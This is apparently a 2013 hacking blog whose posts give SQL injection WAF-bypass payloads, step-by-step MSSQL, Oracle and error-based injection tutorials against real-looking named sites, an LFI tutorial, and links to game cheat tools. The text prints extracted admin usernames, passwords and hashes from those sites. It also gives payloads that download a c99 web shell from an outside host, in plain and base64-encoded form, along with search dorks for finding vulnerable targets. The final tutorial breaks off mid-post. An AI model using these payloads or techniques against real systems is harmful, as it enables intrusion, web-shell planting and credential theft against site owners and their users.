Saturday 19 January 2013

Hard WAF bypass tips

Whitespaces :

union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))

%0Aunion%0Aselect%0A1,2,3--

/**/union/**/select/**/1,2,3--

like ::



PHP Code:
http://www.goavenues.com/list_itinerary.php?id=-4%20union%20%28select%201,2,version%28%29,4,5,6,7,8%29%20-- 

=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Bypassing ::

(Double Keyword): UNIunionON+SELselectECT

+union+distinct+select+

+union+distinctROW+select+

union+/*!select*/+1,2,3

union/**/select/**/1,2,3

uni<on all sel<ect

%20union%20/*!select*/%20

/**//*!union*//**//*!select*//**/

union%23aa%0Aselect

/**/union/*!50000select*/

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

+%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+

id=1+’UnI”On’+'SeL”ECT’ <-MySQL only

id=1+'UnI'||'on'+SeLeCT' <-MSSQL only

like ::


PHP Code:
http://www.goavenues.com/list_itinerary.php?id=-4%20union%23aa%0Aselect%201,2,version%28%29,4,5,6,7,8%20-- 

PHP Code:
http://www.goavenues.com/list_itinerary.php?id=-4%20/**/union/*!50000select*/%201,2,version%28%29,4,5,6,7,8%20-- 

PHP Code:
http://www.goavenues.com/list_itinerary.php?id=-4%20/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/%201,2,version%28%29,4,5,6,7,8%20-- 

=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

after id no. like id=1 +/*!and*/+1=0


+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)


=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
false the url query :
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
id=-1 union all select

id=null union all select

id=1+and+false+union+all+select

id=9999 union all select

=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Order Bypassing do like this

=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/*!table_name*/

+from /*!information_schema*/./*!tables*/ where table_schema=database()


=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))

/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)


like ::


PHP Code:
http://www.westbury.com/article.php?article_id=-117%20union%20select%201,2,unhex%28hex%28Concat%28Column_Name,0x3e,Table_schema, ​ 0x3e,table_Name%29%29%29,4,5,6,7/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char%2837,%20112,%2097,%20115,%20115,%2037%29-- 

user_passwd>westbur6_website>user_info

=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
used with order ::

convert( using ascii) or unhex(hex())

like :
PHP Code:
www.westbury.com/article.php?article_id=-117 union select 1,2,convert(group_concat(table_nameusing ascii),4,5,6,7+from+information_schema.tables -- 

IF'ascii' dosent work? you can try

PHP Code:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2132
armscii8
ascii
binary
cp1250
big5
cp1251
cp1256
cp1257
cp850
cp852
cp866
cp932
dec8
euckr
latin1
utf8 

trick to appear info inside img tag

PHP Code:
concat(0x223e3c62723e,,0x3c696d67207372633d22

when the column is get into html tag,but its not always inside img tag.
it could be <a> or </noscript> or anything.

like ::


PHP Code:
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ concat(0x223e3c2f613e3c2f74643e,version(),0x3c6120687265663d22)--+ 


SQL injector by zerocool

Source :

download


Thursday 10 January 2013

SQli scanner (Automatic column count)+multithreaded


Link to use scanner :
http://zerocoolhf.allalla.com/

If you want to see source code of two files then download it .
Download link :
http://tinyurl.com/azhtkab

Wednesday 9 January 2013

Bypass subquery returns more than 1 row

Hi everyone,Today I'll show you a SQLI TIP,get large data with one request using substr function. use 'limit' is slow,so im gonna teach you how to bypass the error 1242,"'subquery returns more than 1 row'".

I) Using substr function
==

the subtr function is usually for blind injection,but we can use this for bypass the limit of group_concat and the error 1242.
for example,

Code:
http://www.lermitagehotel.ee/?pageid=160 +and+(select+1+from+(select+count(*),concat((select(select+concat(concat(user_na ​ me,0x3a,user_pass),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+informat ​ion_schema.tables+group+by+x)a)
error 1242-
Subquery returns more than 1 row.
we can use substr like that
Code:
And(select 1 from(select count(*),concat(0x3a,(select substr(group_concat(column1,0x3a,column2),1,150)
from table where table_schema like database()),0x3a,floor(rand(0)*2))x
from information_schema.tables group by x)z)-- -
so
Code:
http://www.lermitagehotel.ee/?pageid=160 And(select 1 from(select count(*),concat(0x3a,(select substr(group_concat(table_name),1,150)from information_schema.tables where table_schema like database()),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)z)-- -
and
Quote:Duplicate entry ':admin_topmenu,album_photos,albums,defaults,form_items,form_log,' for key 'group_key'

Incre substr(group_concat(table_name),1,150) ... substr(group_concat(table_name),30,150)... to get next
--
in mysql>5
Code:
or 1 group by concat_ws(0x3a,(select substr(group_concat(column),1,150)
from table),floor(rand(0)*2)) having min(0) or 1-- -
--
in mysql 5.1+
Code:
and updatexml(0,concat(0x3a,(select substr(group_concat(column),1,150)
from table)),0)-- -
--
notice: sometimes query number 2 dosent work,so use the first one.

Code:
II) Using concat() and group_concat()
==
Code:
and updatexml(0,concat(0x3a,(select concat(0x3a,group_concat(column))
from table)),0)-- -
only for extractvalue() / updatexml().

Tuesday 8 January 2013

Counter Strike MultiHack Tools

Counter Strike MultiHack Tools
Features:
Wallhack
Nosmoke
EspBox
FullBright
Noflash
HeadShot Helper
SpeedHack
Sv_cheats bypass
Others

Status:
VAC³ - Undetected
De_Tocs - Undetected (unless sv_cheats bypass activation)
KAC - Undetected (unless sv_cheats bypass activation)
zBlock - Undetected (unless sv_cheats bypass activation)
ServSecurity - Undetected
DBlocker - Undetected
SourceMod AntiCheat - Undetected
ESL Wire - Detected

CSHack is all Windows compatible (XP/Vista/Seven/Windows 8)
.NET Framework 4.0 is needed for run the CSHack.
 

Download


Runescape Multi Hack tool v1

Like name of cheat says, it will give you multi hacks, bunch of hacks together. Hack have counter inside him to not giving you more then few millions gold a day, because then, if he gives you more, this game will be useless and you will get caught. And best part is that this program is 100% secure! Enjoy!



Donwload

Sunday 6 January 2013

mssql server injection tutorial [pics]

This is how i injected mssql server or .aspx.

vul link=http://ogis.edu.in/ViewPhoto.aspx?gid=46

1st way:
Finding version:

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=cast(@@version as int)

Finding database:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=convert(int,db_name())

I will not go for deep about this method.There is already tutorial about it here.

2nd way:
1.Finding no of columns:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 1-- -

it loads normal.Thats good.

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 10-- -
output:
[Image: 54025460.jpg]

so lets reduce it
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 9-- -

Page loads normal.So there are 9 columns.

2. Next we do UnIOn all seLect .
Remember in mssql with aspx you will never get vul columns.You have to find it manually.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
[Image: 54898417.jpg]

Dont worry.Now two ways from here.

1 way (easy) : this way will work rarely and its normal injection.

Just change gid=46 to gid=-46.
so injection will be
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
[Image: 50983947.jpg]

vul col=2
version=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,@@version,3,4,5,6,7,8,9-- -
@@version gives version in mssql .
Remember version() will not work here.

user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,user_name(),3,4,5,6,7,8,9-- -

You can also use current_user , user , system_user instead of user_name() .

database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(),3,4,5,6,7,8,9-- -
db_name() gives primary database.

Now replace db_name() with db_name(1),db_name(2),..,db_name(n) till you get databases.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(1),3,4,5,6,7,8,9-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(11),3,4,5,6,7,8,9-- -

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,schema_name,3,4,5,6,7,8,9 from information_Schema.schemata-- -
This gives all databases in one.
[Image: 93957090.jpg]

Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,table_name,3,4,5,6,7,8,9 from information_Schema.tables where table_schema!=db_name()-- -
Here !=db_name() means other than primary database.
So we get tables of other databases. spicy table is o_adminmst.
[Image: 82377563.jpg]

columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,column_name,3,4,5,6,7,8,9 from information_Schema.columns where table_name='o_adminmst'-- -
[Image: 53670075.jpg]

data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,username,3,4,5,6,7,8,9 from o_adminmst-- -
username=admin
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,password,3,4,5,6,7,8,9 from o_adminmst-- -
pass=admin123#.

2nd way(important) : This way will work with UnIoN in many sites and challenges.
Lets You stuck here :
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -

Now replace all columns with NULL
so it will like
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT null,null,null,null,null,null,null,null,null-- -

Now starts replacing every null with convert(int,@@version) or cast(version() as int).

In my case replacing with first null gives answer.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,@@version),null,null,null,null,null,null,null,null-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(@@version as int),null,null,null,null,null,null,null,null-- -
[Image: 52115856.jpg]

user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(user_name() as int),null,null,null,null,null,null,null,null-- -
output=
Conversion failed when converting the nvarchar value 'db_ogis' to data type int.

You can also use current_user , user , system_user instead of user_name() .

database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(db_name() as int),null,null,null,null,null,null,null,null-- -

output=
Conversion failed when converting the nvarchar value 'db_ogis' to data type int.

Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name())) ,null,null,null,null,null,null,null,null-- -

output=Conversion failed when converting the nvarchar value 'o_updatemst' to data type int.

for next table
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name() and table_name<>'o_updatemst')) ,null,null,null,null,null,null,null,null-- -

output=Conversion failed when converting the nvarchar value 'o_pagemaster' to data type int.

columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst')) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the nvarchar value 'adminid' to data type int.

for next column same as table
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst' and column_name<>'adminid')) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the nvarchar value 'username' to data type int.

data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin' to data type int.

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 password from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin123#' to data type int.

You can use %2b to get username and password at one time.
%2b=+
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username%2b'/'%2bpassword from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin/admin123#' to data type int.

Thants it.

[TUT]Ultimate Local File Injection(lfi) [pics/highly detailed]


1. What is LFI?
2. Finding LFI vulnerabilities
3. Exploiting LFI vulnerabilities
-/proc/self/environ
-/proc/self/fd
- Log poisoning
- wrapper php://filter
- wrapper data://



1.0 What is LFI?

Code:
LFI stands for Local File Inclusion. LFI is a type of web-application security vulnerability. LFI is only one of many web-application security vulnerabilities. Web-applications is applications(in other words: pages/websites) you can view and interact with in your web browser.

2. Finding LFI vulnerabilities
You can easily find it.. .
First lets take a look at a php code that is vulnerable to LFI:
Code:
PHP Code:
<?php$page $_GET[page];
include(
include($page);?>
Now, this is a piece of code that should NEVER be used, because the $page isn't sanitized and is passed directly to the webpage, but unfortunately is very common to be find in the www world.

Now To check for the most basic vulnerabilities all you need to do is manipulate the GET arguments and look for error messages.
lets see it
Normal link : http://www.site.com/ru/page.php?d=1
Injection link : http://www.bid-qualitysummit.com/ru/page.php?d=1asdfgd
Output:
[Image: 454qk.jpg]
Its not always you will get an error message. Sometimes the script might even redirect you to the home page or something when it detects an error.

Dorks:
Code:
inurl:index.php?page=index.php
inurl:index.php?page=sitemap.php
inurl:index.php?page=awards.php
inurl:index.php?page=book.php
inurl:index.php?page=store.php
inurl:index.php?page=items.php
inurl:index.php?page=feedback.php
inurl:index.php?page=welcome.php
inurl:index.php?page=advertise.php
inurl:index.php?page=festival.php
inurl:index.php?page=band.php
inurl:index.php?page=musicians.php
inurl:index.php?page=artist.php
inurl:index.php?page=archive.php
inurl:index.php?page=facilities.php
inurl:index.php?page=activies.php
inurl:index.php?page=bio.php
inurl:index.php?page=biography.php
inurl:index.php?page=menu.php
inurl:index.php?page=profile.php
inurl:index.php?page=terms.php
inurl:index.php?page=tos.php
inurl:index.php?page=screenshots.php
inurl:index.php?page=plans.php
inurl:index.php?page=templates.php
inurl:index.php?page=browse.php
inurl:index.php?page=shows.php
inurl:index.php?page=dining.php
inurl:index.php?page=media.php
inurl:index.php?page=offers.php
inurl:index.php?page=photogallery.php
inurl:index.php?page=schools.php
inurl:index.php?page=rates.php
inurl:index.php?page=buy.php
inurl:index.php?page=pricing.php
inurl:index.php?page=web.php
inurl:index.php?page=cms.php
inurl:index.php?page=sponsors.php
inurl:index.php?page=login.php
inurl:index.php?page=admin.php
inurl:index.php?page=register.php
inurl:index.php?page=signin.php
inurl:index.php?page=signup.php
inurl:index.php?page=artikel.php
inurl:index.php?page=kontakt.php
inurl:index.php?page=directions.php
inurl:index.php?page=farm.php
inurl:index.php?page=resume.php
inurl:index.php?page=products.php
inurl:index.php?page=music.php
inurl:index.php?page=agenda.php
inurl:index.php?page=faculty.php
inurl:index.php?page=overview.php
inurl:index.php?page=research.php
inurl:index.php?page=publications.php
inurl:index.php?page=outreach.php
inurl:index.php?page=education.php
inurl:index.php?page=regulatoins.php



3. Exploiting LFI vulnerabilities
There are 5 methods.
  • /proc/self/environ
  • /proc/self/fd (i will update it later)
  • log poisioning
  • using wrapper php://filter
  • using wrapper data:

/proc/self/environ

Lets say that you have successfully found a vulnerable page.
The URL is http://www.site.com/index.php?page=index
Now replace index with /etc/passwd so it will look like this
Code:
www.site.com/index.php?page=/etc/passwd
well if you ger error "No such file in directory" then go to one directory up using ../
Code:
/../etc/passwd /../../etc/passwd /../../../etc/passwd
like that
If you try just /etc/passwd and if you are lucky you will get this
[Image: etcpass.jpg]
Now thats good. You can include files from server.

Now replace /etc/passwd with /proc/self/environ
so your url will look like this :
Code:
www.site.com/index.php?page=/proc/self/environ
it will give this then its good .You are on way
[Image: procself.jpg]
Now download and install "tamper data plugin in firefox"

Go to tools - tamper data
it will look like this
[Image: tamperdata.jpg]
So your page should still be /proc/self/environ
Click Start Tamper, and refresh your page.
so it will open tamper data and ask us to tamper so click on tamper
[Image: tamper2.jpg]
In the User-Agent field, type:
PHP Code:
<?php phpinfo();?>
Now when your site is down loading, you should get an image that looks something like this if you did it correctly.
[Image: phpinfo.jpg]
Now search for "disable_functions" (Ctrl+F Search function)
Mine is
[Image: disablefunc.jpg]
That is good.We can spawn our shell now!

Now go back and edit your User-Agent.
Change "User-Agent" to:
PHP Code:
<?exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php');?>
wget function downloads shell in .txt format and renames it as shell.php

Save it and refresh your site.
Go to
Code:
http://www.site.com/shell.php
or
Code:
www.site.com/index.php?page=shell.php
Voila,we have our shell up.
Enjoy.

Using log poisioning
After knowing you can include any file(s) with a LFI. You could try log poisoning to execute PHP code to gain higher access to the system.

In order to perform a LFI log poisoning you need to be able to include the apache error or and access logs. Unfortuantly for us I believe this have been made "impossible" in newer versions of apache(the most used web server). Nonetheless. It does not stop us from trying.

First, try including various known locations for the apache logs. Here are a few common paths:
Code:
/etc/httpd/logs/acces_log /etc/httpd/logs/acces.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/access_ log /usr/local/apache/logs/access. log /var/log/apache/access_log /var/log/apache2/access_log /var/log/apache/access.log /var/log/apache2/access.log /var/log/access_log /var/log/access.log /var/www/logs/error_log /var/www/logs/error.log /usr/local/apache/logs/error_l og /usr/local/apache/logs/error.l og /var/log/apache/error_log /var/log/apache2/error_log /var/log/apache/error.log /var/log/apache2/error.log /var/log/error_log /var/log/error.log

Lets say we can include /var/www/logs/access.log.
so our url will be
Code:
http://www.site.com/index.php?page=/var/www/logs/access.log
It will give look like this log:
Code:
11.11.11.11 – - [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1″ 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ” 11.11.11.11 – - [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1″ 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11″ 11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1″ 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ” 11.11.11.11 – - [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164″ – “” Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

so we can see logfile stores also our user agent
so we can exploit it via user agent same in /proc/self/environ

lets we change user agent to
PHP Code:
<? Php echo ‘test’;?>

so now output will be
Code:
11.11.11.11 – - [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1″ 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ” 11.11.11.11 – - [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1″ 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11″ 11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1″ 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ” 11.11.11.11 – - [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164″ – “” test ”

if you get test then we can spawn our shell just by changing user agent to
PHP Code:
<?exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php');?>
Go to
Code:
http://www.site.com/shell.php
or
Code:
www.site.com/index.php?page=shell.php
Voila,we have our shell up.
Enjoy.


Using wrapper php://filter:
what is php://filter ??

php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read.

Well as hacker You can read some yummy file like configuration.php,index.php,database.php etc..
Lets see we read index.php file

Injection link:
Code:
http://site.com/index.php?file=php://filter/convert.base64-encode/resource=index
it will give you result in base64 encoding like this
[Image: phpfilter.jpg]

To read you have to decode that content at
base64decode.org
thats it .


Using wrapper data://
The data: (» RFC 2397) stream wrapper is available since PHP 5.2.0.
Taking advantage of PHP’s RFC 2397 support (http://php.net/manual/en/wrappers.data.php), you can inject the PHP code you want executed directly into the URL.

Lets see it:
Code:
http://www.site.com/index.php?page=data:,?&cmd=whoami

It also supports base 64 Encoding...
Code:
http://www.site.com/index.php?page=data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami

Using the base64 encoding, you may be able to shorten your injection pending that they have size restrictions.
Also notice above, when using $_GET[cmd], there aren’t any quotes used. This still works effectively and it comes in handy if the server has magic_quotes enabled

Note:You can upload shell using it like Encode
PHP Code:
<? exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php'); ?>
in base64 we get this
Code:
PD8gZXhlYyhcJ3dnZXQgaHR0cDovL3d3dy50ZWt0YW8uY29tLmNuL2ZpbGVzL2M5OS50eHQgLU8gc2hl​bGwucGhwXCcpOyA/Pg==

so injection will be
Code:
http://www.site.com/index.php?page= data:;base64,PD8gZXhlYyhcJ3dnZXQgaHR0cDovL3d3dy50ZWt0YW8uY29tLmNuL2ZpbGVzL2M5OS5​0eHQgLU8gc2hlbGwucGhwXCcpOyA/Pg==

Now navigate to
Code:
http://www.site.com/shell.php
or
Code:
http://www.site.com/index.php?page=shell.php

Thats it!!!!

Sorry if i have made mistake.

Saturday 5 January 2013

Oracle SQL injection tutorial

Hello guys this is a tutorial about Oracle based SQL injection .
Here is the site to learn with

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 

Let's try order by

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 order by 1 

look under the picture shit stays like this
Sei in : Home -> Citta' -> Congressi

At order by 7 boom changes

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122%20order%20by%207 
Sei in : Home -> Citta' ->
Then no. of columns=6

Time to use union select

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,null,null,null,null,null 

LOLS...Vulnerable column isn't shown..
Let's try all columns

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select banner,null,null,null,null,null from v$version 

nothing shown wrong column

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,banner,null,null,null,null from v$version 

word congress shown again..This is the right column
change id_categoria to null

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,banner,null,null,null,null%20from% ​20v$version 

version: CORE 9.2.0.6.0 Production


CURRENT USER

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,user,NULL,NULL,NULL,NULL from dual--
output=WWWTARANTO

CURRENT DATABASE


Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL from DUAL--

output=CSTTA

another methods :
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,global_name,NULL,NULL,NULL,NULL from global_name-- -



time to get tables
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null union select null,table_name,null,null,null,null from (select ROWNUM r,table_name from all_tables order by table_name) where r=130
This will get table number 130...Change r to get table number

time to get this table's columns

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,column_name,null,null,null,null%20 ​ from%20%28select%20ROWNUM%20r,column_name%20from%20all_tab_columns%20where%20tab ​le_name=%27RESULT$%27%29%20where%20r=3 

change with r here too

Retrieving user created tables and columns from user_tab_columns. concat() works but takes only 2 parameters.


Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS--

54425F414C424F3A444154415F45534543555A494F4E45
convert this hex value to string.
TB_ALBO:DATA_ESECUZIONE

To find the next column of table TB_ALBO

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where column_name> CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--

Code:
CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69) = DATA_ESECUZIONE

54425F414C424F3A444154415F505542424C4943415A494F4E45
TB_ALBO:DATA_PUBBLICAZIONE

using > all columns can be retrieved. If any error is generated or query jumps to some other table, then move on to the next table.

MOVING TO NEXT TABLE

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79)--

54425F414C424F5F444F43554D454E544F3A4445534352495A494F4E45
TB_ALBO_DOCUMENTO:DESCRIZIONE

MOVING TO NEXT COLUMN OF TABLE TB_ALBO_DOCUMENTO

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79) and column_name> CHR(68) || CHR(69) || CHR(83) || CHR(67) || CHR(82) || CHR(73) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--

54425F414C424F5F444F43554D454E544F3A4944
TB_ALBO_DOCUMENTO:ID

EXTRACTING DATA

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(LOGIN||chr(58)||PASSWORD),NULL,NULL,NULL,NULL from TB_UTENTE--

61646D696E6973747261746F723A3966323165646463363865663338373837666235656639313939​316265613264

administrator:9f21eddc68ef38787fb5ef91991bea2d



Wednesday 2 January 2013

Error based sql injection tutorial - Double query injection

Lets start injection
What you need a vul site like this


Code:
www.site.com/artist.php?i=36

At first testing site for vul

Code:
www.site.com/artist.php?i=36'
we get error
[Image: erroryu.png]

Ok lets go inject this

Code:
www.site.com/artist.php?i=36 order by 10--  no error
www.site.com/artist.php?i=36 order by 20--  no error
www.site.com/artist.php?i=36 order by 50--  no error
www.site.com/artist.php?i=36 order by 100--    no error

So like string base lest try this

Code:
www.site.com/artist.php?i=36' order by 100--+

Now we have an error in columns
[Image: unknownd.png]

Now going to get columns
Code:
www.site.com/artist.php?i=36' order by 10--+    erro

www.site.com/artist.php?i=36' order by 8--+    error
www.site.com/artist.php?i=36' order by 6--+    error
www.site.com/artist.php?i=36' order by 5--+    no error

Ok find number of columns next step it using union to find vul column to inject there

Code:
www.site.com/artist.php?i=36' union select 1,2,3,4,5--+
As you see

Code:
The used SELECT statements have a different number of columns
[Image: unionr.png]

So what can we do trying another method like blind lets see it

Code:
www.site.com/artist.php?i=36' and 1=1--+    its true not get error from this
www.site.com/artist.php?i=36' and 1=2--+    its false and steal no erro
Whats now?
Are we should give up and find other site?
No,lets try other method called ERROR BASED INJECTION(DOUBLE QUERY)

In this method we use specific syntax for getting data from database

The code we use for getting version,database and aslo user like this

Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now trying this syntax in our site

Code:

